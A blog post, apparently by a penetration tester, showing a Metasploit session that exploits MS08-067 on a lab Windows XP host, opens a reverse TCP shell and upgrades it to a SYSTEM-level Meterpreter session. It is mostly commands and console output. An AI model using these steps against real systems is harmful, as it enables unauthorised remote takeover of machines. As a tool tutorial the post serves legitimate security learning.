Seeing is believing 🙂

root@bt:~# msfconsole

=[ metasploit v3.8.0-dev [core:3.8 api:1.0]
+ -- --=[ 707 exploits - 359 auxiliary - 57 post
+ -- --=[ 225 payloads - 27 encoders - 8 nops
=[ svn r13065 updated today (2011.06.29)

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/shell_reverse_tcp
payload => windows/shell_reverse_tcp
msf exploit(ms08_067_netapi) > set lhost 192.168.96.1
lhost => 192.168.96.1
msf exploit(ms08_067_netapi) > set rhost 192.168.96.129
rhost => 192.168.96.129
msf exploit(ms08_067_netapi) > set lport 443
lport => 443
msf exploit(ms08_067_netapi) > exploit -z

[*] Started reverse handler on 192.168.96.1:443
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Command shell session 1 opened (192.168.96.1:443 -> 192.168.96.129:1094) at 2011-06-30 00:47:32 +0700
[*] Session 1 created in the background.
msf exploit(ms08_067_netapi) > sessions -l

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 shell windows Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32> 192.168.96.1:443 -> 192.168.96.129:1094

Good, command shell is on the background now, what if we want to change that existing command shell session into meterpreter session? re-exploit? Oops, you should forget about to re-exploit, Metasploit has a feature to upgrade the command shell session to meterpreter session, look at the -u option. Let’s try that.

msf exploit(ms08_067_netapi) > sessions -h
Usage: sessions [options]

Active session manipulation and interaction.

OPTIONS:

-K Terminate all sessions
-c Run a command on the session given with -i, or all
-d Detach an interactive session
-h Help banner
-i Interact with the supplied session ID
-k Terminate session
-l List all active sessions
-q Quiet mode
-r Reset the ring buffer for the session given with -i, or all
-s Run a script on the session given with -i, or all
-u Upgrade a win32 shell to a meterpreter session
-v List verbose fields

msf exploit(ms08_067_netapi) > sessions -u 1

[*] Started reverse handler on 192.168.96.1:443
[*] Starting the payload handler...
[*] Command Stager progress - 1.66% done (1699/102108 bytes)
[*] Command Stager progress - 3.33% done (3398/102108 bytes)
[*] Command Stager progress - 4.99% done (5097/102108 bytes)
[*] Command Stager progress - 6.66% done (6796/102108 bytes)
[*] Command Stager progress - 8.32% done (8495/102108 bytes)
[*] Command Stager progress - 9.98% done (10194/102108 bytes)
[*] Command Stager progress - 11.65% done (11893/102108 bytes)
[*] Command Stager progress - 13.31% done (13592/102108 bytes)
[*] Command Stager progress - 14.98% done (15291/102108 bytes)
[*] Command Stager progress - 16.64% done (16990/102108 bytes)
[*] Command Stager progress - 18.30% done (18689/102108 bytes)
[*] Command Stager progress - 19.97% done (20388/102108 bytes)
[*] Command Stager progress - 21.63% done (22087/102108 bytes)
[*] Command Stager progress - 23.29% done (23786/102108 bytes)
[*] Command Stager progress - 24.96% done (25485/102108 bytes)
[*] Command Stager progress - 26.62% done (27184/102108 bytes)
[*] Command Stager progress - 28.29% done (28883/102108 bytes)
[*] Command Stager progress - 29.95% done (30582/102108 bytes)
[*] Command Stager progress - 31.61% done (32281/102108 bytes)
[*] Command Stager progress - 33.28% done (33980/102108 bytes)
[*] Command Stager progress - 34.94% done (35679/102108 bytes)
[*] Command Stager progress - 36.61% done (37378/102108 bytes)
[*] Command Stager progress - 38.27% done (39077/102108 bytes)
[*] Command Stager progress - 39.93% done (40776/102108 bytes)
[*] Command Stager progress - 41.60% done (42475/102108 bytes)
[*] Command Stager progress - 43.26% done (44174/102108 bytes)
[*] Command Stager progress - 44.93% done (45873/102108 bytes)
[*] Command Stager progress - 46.59% done (47572/102108 bytes)
[*] Command Stager progress - 48.25% done (49271/102108 bytes)
[*] Command Stager progress - 49.92% done (50970/102108 bytes)
[*] Command Stager progress - 51.58% done (52669/102108 bytes)
[*] Command Stager progress - 53.25% done (54368/102108 bytes)
[*] Command Stager progress - 54.91% done (56067/102108 bytes)
[*] Command Stager progress - 56.57% done (57766/102108 bytes)
[*] Command Stager progress - 58.24% done (59465/102108 bytes)
[*] Command Stager progress - 59.90% done (61164/102108 bytes)
[*] Command Stager progress - 61.57% done (62863/102108 bytes)
[*] Command Stager progress - 63.23% done (64562/102108 bytes)
[*] Command Stager progress - 64.89% done (66261/102108 bytes)
[*] Command Stager progress - 66.56% done (67960/102108 bytes)
[*] Command Stager progress - 68.22% done (69659/102108 bytes)
[*] Command Stager progress - 69.88% done (71358/102108 bytes)
[*] Command Stager progress - 71.55% done (73057/102108 bytes)
[*] Command Stager progress - 73.21% done (74756/102108 bytes)
[*] Command Stager progress - 74.88% done (76455/102108 bytes)
[*] Command Stager progress - 76.54% done (78154/102108 bytes)
[*] Command Stager progress - 78.20% done (79853/102108 bytes)
[*] Command Stager progress - 79.87% done (81552/102108 bytes)
[*] Command Stager progress - 81.53% done (83251/102108 bytes)
[*] Command Stager progress - 83.20% done (84950/102108 bytes)
[*] Command Stager progress - 84.86% done (86649/102108 bytes)
[*] Command Stager progress - 86.52% done (88348/102108 bytes)
[*] Command Stager progress - 88.19% done (90047/102108 bytes)
[*] Command Stager progress - 89.85% done (91746/102108 bytes)
[*] Command Stager progress - 91.52% done (93445/102108 bytes)
[*] Command Stager progress - 93.18% done (95144/102108 bytes)
[*] Command Stager progress - 94.84% done (96843/102108 bytes)
[*] Command Stager progress - 96.51% done (98542/102108 bytes)
[*] Command Stager progress - 98.15% done (100216/102108 bytes)
[*] Command Stager progress - 99.78% done (101888/102108 bytes)
[*] Sending stage (752128 bytes) to 192.168.96.129
[*] Command Stager progress - 100.00% done (102108/102108 bytes)
msf exploit(ms08_067_netapi) > [*] Meterpreter session 2 opened (192.168.96.1:443 -> 192.168.96.129:1095) at 2011-06-30 00:48:12 +0700

Well, new meterpreter session is now on the session list 😉

msf exploit(ms08_067_netapi) > sessions -l

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 shell windows Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32> 192.168.96.1:443 -> 192.168.96.129:1094
2 meterpreter x86/win32 NT AUTHORITYSYSTEM @ XP_FDCC 192.168.96.1:443 -> 192.168.96.129:1095

msf exploit(ms08_067_netapi) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: NT AUTHORITYSYSTEM
meterpreter >

nice feature, good job Metasploit team 😉

About the Author modpr0be

Posisi saya saat ini sebagai direktur dan pemilik PT Spentera, sebuah perusahaan yang fokus dalam bidang penetration test, incident response, intrusion analysis and forensic investigation. Saya sering memberikan konsultasi tentang strategi keamanan kepada investor, mitra, dan pelanggan. Saya juga memberikan materi dalam bentuk pelatihan dan kontribusi komunitas dalam bentuk seminar, workshop, dan diskusi dengan berbagai topik seperti teknik peretasan, teknik eksploitasi, dan analisis intrusi. Saya juga berkontribusi untuk repositori eksploit Metasploit Framework sebagai pengembang kode eksploit. Saat ini saya memegang sertifikasi dari Offensive Security Certified Professional (OSCP), Offensive Security Certified Expert (OSCE), ISO/IEC ISMS 27001: 2013 Lead Auditor/Auditor, GIAC Certified Intrusion Analyst (GCIA), dan Offensive Security Exploitation Expert (OSEE). Jika ingin menghubungi saya dapat melalui email di tom at spentera dot id.

Tinggalkan Balasan

Please log in using one of these methods to post your comment:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout /  Ubah )

Foto Google

You are commenting using your Google account. Logout /  Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout /  Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout /  Ubah )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.

%d blogger menyukai ini: